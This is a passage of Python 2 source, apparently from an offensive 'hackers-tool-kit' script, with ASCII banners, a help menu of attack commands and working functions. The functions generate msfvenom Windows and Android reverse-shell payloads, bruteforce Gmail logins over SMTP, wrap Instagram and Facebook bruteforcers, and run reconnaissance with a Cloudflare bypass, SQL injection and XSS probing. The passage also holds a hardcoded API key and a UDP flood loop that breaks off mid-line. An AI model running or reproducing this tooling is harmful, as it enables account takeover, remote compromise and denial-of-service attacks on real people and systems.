██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') + + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,20) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping 